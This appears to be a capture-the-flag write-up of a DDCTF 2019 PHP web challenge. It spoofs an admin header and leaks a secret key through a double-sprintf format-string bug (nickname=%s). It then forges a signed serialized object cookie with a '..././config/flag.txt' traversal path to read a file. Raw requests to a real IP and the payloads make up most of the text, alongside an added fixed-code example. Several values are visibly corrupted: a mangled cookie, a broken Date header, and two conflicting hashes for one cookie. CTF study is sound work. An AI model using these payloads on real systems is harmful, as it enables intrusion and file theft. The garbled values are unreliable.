http://117.51.158.44/index.php
Capturing the request twice shows a didictf_username header; set its value to admin.
您当前当前权限为管理员----请访问:app/fL2XID2i0Cdh.php
Visiting app/fL2XID2i0Cdh.php gives the source code.
Reading the source shows that the program verifies the cookie:
$hash = substr($session,strlen($session)-32);       // last 32 chars of the cookie: the MD5
$session = substr($session,0,strlen($session)-32);  // everything before it: the serialized data
if($hash !== md5($this->eancrykey.$session)) {      // MD5 of (key . data) must match the appended hash
    parent::response("the cookie data not match",'error');
    return FALSE;
}
If the check passes, the value is then passed to unserialize.
Directly visit /app/Session.php:
GET /app/Session.php HTTP/1.1
Host: 117.51.158.44
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
didictf_username: admin
Cookie: BL_D_PROV=undefined; BL_T_PROV=undefined; BL_D_PROV=undefined; BL_T_PROV=undefined
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
and we get the following cookie:
ddctf_id=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227ff2d9fa4b9f72700aa0787fbb60c03e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A11%3A%22110.83.19.7%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A82%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.14%3B+rv%3A66.0%29+Gecko%2F20100101+Firefox%2F66.0%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D782e78e81fcebe135f54c659a32a31e6
URL-decoding it gives the following string:
a:4:{s:10:"session_id";s:32:"7ff2d9fa4b9f72700aa0787fbb60c03e";s:10:"ip_address";s:11:"110.83.19.7";s:10:"user_agent";s:82:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0";s:9:"user_data";s:0:"";}782e78e81fcebe135f54c659a32a31e6
It is a serialized value followed by an MD5 hash.
From the source code, this MD5 is computed after concatenating the serialized value with the key from key.txt.
The vulnerability in this challenge is here:
public function __destruct() {
    if(empty($this->path)) {
        exit();
    }else{
        $path = $this->sanitizepath($this->path);
        // the numeric literal compared against here was lost in extraction; $expected_len stands in for it
        if(strlen($path) !== $expected_len) {
            exit();
        }
        // the sanitized path is read from disk and returned in the response
        $this->response($data=file_get_contents($path),'Congratulations');
    }
    exit();
}
}
Our task is to construct a special serialized value like this:
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}+md5
So the task is to produce this MD5, and to produce it we need the key.
Look at the following code:
if(!empty($_POST["nickname"])) {
    $arr = array($_POST["nickname"],$this->eancrykey);   // user input first, then the secret key
    $data = "Welcome my friend %s";
    foreach ($arr as $k => $v) {
        $data = sprintf($data,$v);   // formatted twice: the output of pass 1 (containing the nickname) becomes the format string of pass 2
    }
    parent::response($data,"Welcome");
}
This contains a format-string vulnerability:
Construct the following request
POST /app/Session.php HTTP/1.1
Host: 117.51.158.44
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
didictf_username: admin
Upgrade-Insecure-Requests: 1
Cookie: ddctf_id=a%A4%A%Bs%A10%A%session_id%%Bs%A32%A%d6422e9e796e957c70ade5%%Bs%A10%A%ip_address%%Bs%A11%A%22110.83.19.7%%Bs%A10%A%user_agent%%Bs%A82%A%Mozilla%F5.0+%Macintosh%B+Intel+Mac+OS+X+10.14%B+rv%A66.0%+Gecko%F20100101+Firefox%F66.0%%Bs%A9%A%user_data%%Bs%A0%A%%%B%D3e0de25e5c5ec1fa2a3c9243ed5e5e19
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

nickname=%s
and get the key value:
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Tue, Apr :: GMT
Content-Type: application/json
Connection: keep-alive
Content-Length:
{"errMsg":"success","data":"\u60a8\u5f53\u524d\u5f53\u524d\u6743\u9650\u4e3a\u7ba1\u7406\u5458----\u8bf7\u8bbf\u95ee:app\/fL2XID2i0Cdh.php"}{"errMsg":"Welcome","data":"Welcome my friend EzblrbNS\r\n"}{"errMsg":"sucess","data":"DiDI Welcome you Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko\/20100101 Firefox\/66.0"}
The key is found:
EzblrbNS
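The leak above comes from the two-pass sprintf loop in the challenge code. As an added example that is not part of the original write-up, the vulnerable loop next to a fixed version that formats exactly once and never passes the secret through sprintf; the key value is a constructed placeholder.

```php
<?php
// Added example, not from the challenge source. $key is a constructed placeholder.

// The challenge's loop: the greeting is formatted twice. In pass 1 the nickname
// is substituted into "Welcome my friend %s"; in pass 2 the RESULT of pass 1 is
// used as the format string and the key is the argument. A nickname that itself
// contains "%s" therefore becomes a directive that is filled with the key.
function welcome_vulnerable(string $nickname, string $key): string {
    $arr  = array($nickname, $key);
    $data = "Welcome my friend %s";
    foreach ($arr as $v) {
        $data = sprintf($data, $v);   // pass 1: arg = nickname; pass 2: arg = key
    }
    return $data;
}

// Fixed: a constant format string, the user value only ever in argument
// position, and the secret kept out of the call entirely. Any "%s" in the
// nickname is now just text in the output.
function welcome_fixed(string $nickname): string {
    return sprintf("Welcome my friend %s", $nickname);
}

$key = "EXAMPLE_KEY_placeholder";

echo welcome_vulnerable("alice", $key), "\n";   // nickname without directives: harmless
echo welcome_vulnerable("%s", $key), "\n";      // nickname "%s": pass 2 fills it with $key
echo welcome_fixed("%s"), "\n";                 // same input, key never reachable
```

A detection hint for the same pattern: any call where the format argument of sprintf/printf is a variable that was built from request data, rather than a literal, deserves the same review.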
Then construct the serialized value:
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}
EzblrbNSO:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}5a014dbe49334e6dbb7326046950bee2
Construct the cookie:
O:11:"Application":1:{s:4:"path";s:21:"..././config/flag.txt";}e5de768d30d12a3d53ba10235b5712a7
O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22..././config/flag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2
and get the flag:
{"errMsg":"success","data":"\u60a8\u5f53\u524d\u5f53\u524d\u6743\u9650\u4e3a\u7ba1\u7406\u5458----\u8bf7\u8bbf\u95ee:app\/fL2XID2i0Cdh.php"}{"errMsg":"Congratulations","data":"DDCTF{ddctf2019_G4uqwj6E_pHVlHIDDGdV8qA2j}"}